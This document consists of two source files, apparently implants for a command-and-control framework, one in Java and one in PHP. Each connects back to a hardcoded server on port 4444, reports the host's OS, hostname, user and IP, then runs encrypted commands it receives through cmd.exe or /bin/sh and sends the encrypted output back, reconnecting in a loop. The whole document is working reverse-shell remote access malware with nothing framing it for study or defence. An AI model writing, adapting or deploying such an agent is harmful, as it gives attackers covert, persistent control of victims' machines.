File: AGENT/tomcatv2a.java
import java.io.*;
import java.net.*;
import java.util.*;
import java.util.Base64;
import javax.crypto.*;
import javax.crypto.spec.*;

public class TomcatAgent {

    private static final String SERVER_HOST = "10.64.142.90";
    private static final int SERVER_PORT = 4444;
    private static byte[] key;

    public static void main(String[] args) {
        while (true) {
            try {
                connectToServer();
            } catch (Exception e) {
                System.out.println("[-] Error: " + e.getMessage());
            }

            try {
                System.out.println("[*] Reconnecting in 5 seconds...");
                Thread.sleep(5000);
            } catch (InterruptedException e) {
                break;
            }
        }
    }

    private static void connectToServer() throws Exception {
        System.out.println("[*] Connecting to " + SERVER_HOST + ":" + SERVER_PORT);

        Socket socket = new Socket();
        socket.connect(new InetSocketAddress(SERVER_HOST, SERVER_PORT), 10000);

        System.out.println("[+] Connected!");

        InputStream in = socket.getInputStream();
        OutputStream out = socket.getOutputStream();

        byte[] keyBuffer = new byte[1024];
        int keyLen = in.read(keyBuffer);
        if (keyLen <= 0) {
            throw new Exception("No key received");
        }

        key = new byte[keyLen];
        System.arraycopy(keyBuffer, 0, key, 0, keyLen);

        System.out.println("[+] Key received");

        String hostname = InetAddress.getLocalHost().getHostName();
        String user = System.getProperty("user.name");
        String os = System.getProperty("os.name");
        String arch = System.getProperty("os.arch");
        String agentIP = getLocalIP();

        String info = String.format(
            "{\"os\":\"%s\",\"hostname\":\"%s\",\"user\":\"%s\",\"architecture\":\"%s\",\"agentIP\":\"%s\",\"pythonVersion\":\"Java-%s\"}",
            os,
            hostname,
            user,
            arch,
            agentIP,
            System.getProperty("java.version")
        );

        out.write(info.getBytes());
        out.flush();
        Thread.sleep(500);

        System.out.println("[+] Handshake complete");

        while (true) {
            ByteArrayOutputStream cmdBuffer = new ByteArrayOutputStream();
            byte[] chunk = new byte[4096];
            int bytesRead;

            while ((bytesRead = in.read(chunk)) > 0) {
                cmdBuffer.write(chunk, 0, bytesRead);

                try {
                    String command = decrypt(cmdBuffer.toByteArray());
                    if (command != null && !command.isEmpty()) {
                        System.out.println(
                            "[+] Command: " + command.substring(0, Math.min(50, command.length())) + "..."
                        );

                        String output = executeCommand(command, hostname, user, os, arch, agentIP);

                        if (output.length() > 1000000) {
                            output = output.substring(0, 1000000) + "\n...[OUTPUT TRUNCATED - TOO LARGE]";
                        }

                        byte[] encryptedOutput = encrypt(output);
                        out.write(encryptedOutput);
                        out.write("<END>".getBytes());
                        out.flush();

                        System.out.println("[+] Response sent");

                        if (command.equalsIgnoreCase("exit") || command.equalsIgnoreCase("quit")) {
                            socket.close();
                            return;
                        }

                        break;
                    }
                } catch (Exception e) {
                    if (cmdBuffer.size() > 1048576) {
                        throw new Exception("Command too large");
                    }
                }
            }

            if (bytesRead == -1) {
                break;
            }
        }

        socket.close();
        System.out.println("[*] Disconnected");
    }

    private static String getLocalIP() {
        try {
            Socket socket = new Socket();
            socket.connect(new InetSocketAddress("8.8.8.8", 80), 1000);
            String ip = socket.getLocalAddress().getHostAddress();
            socket.close();
            return ip;
        } catch (Exception e) {
            return "N/A";
        }
    }

    private static String executeCommand(
        String command,
        String hostname,
        String user,
        String os,
        String arch,
        String agentIP
    ) {
        try {
            if (command.equals("SYSINFO")) {
                StringBuilder info = new StringBuilder();
                info.append("OS: ").append(os).append("\n");
                info.append("Hostname: ").append(hostname).append("\n");
                info.append("User: ").append(user).append("\n");
                info.append("Arch: ").append(arch).append("\n");
                info.append("Agent IP: ").append(agentIP).append("\n");
                info.append("Java Version: ").append(System.getProperty("java.version")).append("\n");
                info.append("Current Dir: ").append(System.getProperty("user.dir"));
                return info.toString();
            } else if (command.equals("SCREENSHOT")) {
                return "ERROR: Screenshot not supported in Java agent";
            } else if (command.equalsIgnoreCase("exit") || command.equalsIgnoreCase("quit")) {
                return "Agent disconnecting...";
            }

            String[] cmd;
            if (os.toLowerCase().contains("win")) {
                cmd = new String[] { "cmd.exe", "/c", command };
            } else {
                cmd = new String[] { "/bin/sh", "-c", command };
            }

            Process process = Runtime.getRuntime().exec(cmd);

            BufferedReader stdInput = new BufferedReader(new InputStreamReader(process.getInputStream()));
            BufferedReader stdError = new BufferedReader(new InputStreamReader(process.getErrorStream()));

            StringBuilder output = new StringBuilder();
            String line;

            while ((line = stdInput.readLine()) != null) {
                output.append(line).append("\n");
            }

            while ((line = stdError.readLine()) != null) {
                output.append(line).append("\n");
            }

            process.waitFor();

            String result = output.toString();
            return result.isEmpty() ? "Command executed (no output)" : result;
        } catch (Exception e) {
            return "ERROR: " + e.getMessage();
        }
    }

    private static byte[] encrypt(String data) throws Exception {
        try {
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            SecretKeySpec keySpec = new SecretKeySpec(Arrays.copyOf(key, 32), "AES");
            IvParameterSpec ivSpec = new IvParameterSpec(new byte[16]);
            cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);
            return cipher.doFinal(data.getBytes());
        } catch (Exception e) {
            return xorEncrypt(data.getBytes(), key);
        }
    }

    private static String decrypt(byte[] encryptedData) throws Exception {
        try {
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            SecretKeySpec keySpec = new SecretKeySpec(Arrays.copyOf(key, 32), "AES");
            byte[] iv = Arrays.copyOf(encryptedData, 16);
            IvParameterSpec ivSpec = new IvParameterSpec(iv);
            cipher.init(Cipher.DECRYPT_MODE, keySpec, ivSpec);
            byte[] decrypted = cipher.doFinal(Arrays.copyOfRange(encryptedData, 16, encryptedData.length));
            return new String(decrypted);
        } catch (Exception e) {
            byte[] decrypted = xorEncrypt(encryptedData, key);
            return new String(decrypted);
        }
    }

    private static byte[] xorEncrypt(byte[] data, byte[] key) {
        byte[] output = new byte[data.length];
        for (int i = 0; i < data.length; i++) {
            output[i] = (byte) (data[i] ^ key[i % key.length]);
        }
        return output;
    }
}

File: AGENT/tomcatv2a.php
<?php

error_reporting(0);
set_time_limit(0);

$serverHost = "0.0.0.0";
$serverPort = 4444;

function getLocalIP() {
    $socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
    if ($socket === false) return "N/A";
    $result = @socket_connect($socket, "8.8.8.8", 80);
    if ($result === false) {
        socket_close($socket);
        return "N/A";
    }
    socket_getsockname($socket, $addr, $port);
    socket_close($socket);
    return $addr ?: "N/A";
}

function base64UrlDecode($input) {
    $remainder = strlen($input) % 4;
    if ($remainder) {
        $padlen = 4 - $remainder;
        $input .= str_repeat('=', $padlen);
    }
    return base64_decode(strtr($input, '-_', '+/'));
}

function base64UrlEncode($input) {
    return str_replace('=', '', strtr(base64_encode($input), '+/', '-_'));
}

function fernetDecrypt($token, $key) {
    try {
        $decoded = base64_decode($token);
        if (strlen($decoded) < 57) {
            return false;
        }
        $version = ord($decoded[0]);
        if ($version != 0x80) {
            return false;
        }
        $timestamp = substr($decoded, 1, 8);
        $iv = substr($decoded, 9, 16);
        $ciphertext = substr($decoded, 25, -32);
        $hmac = substr($decoded, -32);
        $signingKey = substr(hash('sha256', $key . 'signing', true), 0, 32);
        $encryptionKey = substr(hash('sha256', $key . 'encryption', true), 0, 32);
        $computedHmac = hash_hmac('sha256', substr($decoded, 0, -32), $signingKey, true);
        if (!hash_equals($hmac, $computedHmac)) {
            return false;
        }
        $decrypted = openssl_decrypt($ciphertext, 'AES-128-CBC', $encryptionKey, OPENSSL_RAW_DATA, $iv);
        return $decrypted;
    } catch (Exception $e) {
        return false;
    }
}

function fernetEncrypt($data, $key) {
    try {
        $version = chr(0x80);
        $timestamp = pack('J', time());
        $iv = openssl_random_pseudo_bytes(16);
        $signingKey = substr(hash('sha256', $key . 'signing', true), 0, 32);
        $encryptionKey = substr(hash('sha256', $key . 'encryption', true), 0, 32);
        $ciphertext = openssl_encrypt($data, 'AES-128-CBC', $encryptionKey, OPENSSL_RAW_DATA, $iv);
        $payload = $version . $timestamp . $iv . $ciphertext;
        $hmac = hash_hmac('sha256', $payload, $signingKey, true);
        $token = $payload . $hmac;
        return base64_encode($token);
    } catch (Exception $e) {
        return false;
    }
}

function executeCommand($command) {
    global $hostname,
    $user,
    $os,
    $arch,
    $agentIP;
    if ($command === "SYSINFO") {
        $output = "OS: $os\n";
        $output .= "Hostname: $hostname\n";
        $output .= "User: $user\n";
        $output .= "Arch: $arch\n";
        $output .= "Agent IP: $agentIP\n";
        $output .= "PHP Version: " . phpversion() . "\n";
        $output .= "Current Dir: " . getcwd();
        return $output;
    } elseif ($command === "SCREENSHOT") {
        return "ERROR: Screenshot not supported in PHP agent";
    } elseif (in_array(strtolower($command), ['exit', 'quit', 'disconnect'])) {
        return "Agent disconnecting...";
    }

    $descriptors = array(
        0 => array("pipe", "r"),
        1 => array("pipe", "w"),
        2 => array("pipe", "w")
    );

    if (stripos(PHP_OS, 'WIN') === 0) {
        $process = proc_open("cmd /c " . $command . " 2>&1", $descriptors, $pipes);
    } else {
        $process = proc_open($command . " 2>&1", $descriptors, $pipes);
    }

    if (is_resource($process)) {
        fclose($pipes[0]);

        $output = stream_get_contents($pipes[1]);
        $error = stream_get_contents($pipes[2]);

        fclose($pipes[1]);
        fclose($pipes[2]);

        proc_close($process);

        $result = $output . $error;
        return empty($result) ? "Command executed (no output)" : $result;
    }

    return "ERROR: Failed to execute command";
}

while (true) {
    echo "[*] Connecting to $serverHost:$serverPort\n";

    $socket = @stream_socket_client("tcp://$serverHost:$serverPort", $errno, $errstr, 10);

    if (!$socket) {
        echo "[-] Connection failed: $errstr ($errno)\n";
        sleep(5);
        continue;
    }

    echo "[+] Connected!\n";

    stream_set_blocking($socket, true);
    stream_set_timeout($socket, 10);

    $key = stream_get_contents($socket, 1024);
    $key = rtrim($key, "\x00\r\n");

    if (empty($key)) {
        echo "[-] No key received\n";
        fclose($socket);
        sleep(5);
        continue;
    }

    echo "[+] Key received (" . strlen($key) . " bytes)\n";

    $hostname = gethostname();
    $user = get_current_user();
    $os = PHP_OS;
    $arch = php_uname('m');
    $agentIP = getLocalIP();

    $info = json_encode(array(
        'OS' => $os,
        'Hostname' => $hostname,
        'User' => $user,
        'Architecture' => $arch,
        'AgentIP' => $agentIP,
        'Python' => 'PHP-' . phpversion()
    ), JSON_UNESCAPED_SLASHES);
    fwrite($socket, $info);
    fflush($socket);
    usleep(500000);
    echo "[+] Handshake complete\n";
    stream_set_timeout($socket, 300);
    while (!feof($socket)) {
        $encryptedCmd = stream_get_contents($socket, 8192);
        if ($encryptedCmd === false || $encryptedCmd === '') {
            echo "[-] Connection closed by server\n";
            break;
        }
        $command = fernetDecrypt($encryptedCmd, $key);
        if ($command === false) {
            echo "[-] Failed to decrypt command\n";
            continue;
        }
        echo "[+] Command received: " . substr($command, 0, 50) . "...\n";
        $output = executeCommand($command);
        if (strlen($output) > 1000000) {
            $output = substr($output, 0, 1000000) . "\n...[OUTPUT TRUNCATED - TOO LARGE]";
        }
        $encryptedOutput = fernetEncrypt($output, $key);
        if ($encryptedOutput === false) {
            echo "[-] Failed to encrypt output\n";
            continue;
        }
        fwrite($socket, $encryptedOutput . "<END>");
        fflush($socket);
        echo "[+] Response sent (" . strlen($encryptedOutput) . " bytes)\n";
        if (in_array(strtolower($command), ['exit', 'quit', 'disconnect'])) {
            break;
        }
    }
    fclose($socket);
    echo "[*] Disconnected. Reconnecting in 5 seconds...\n";
    sleep(5);
}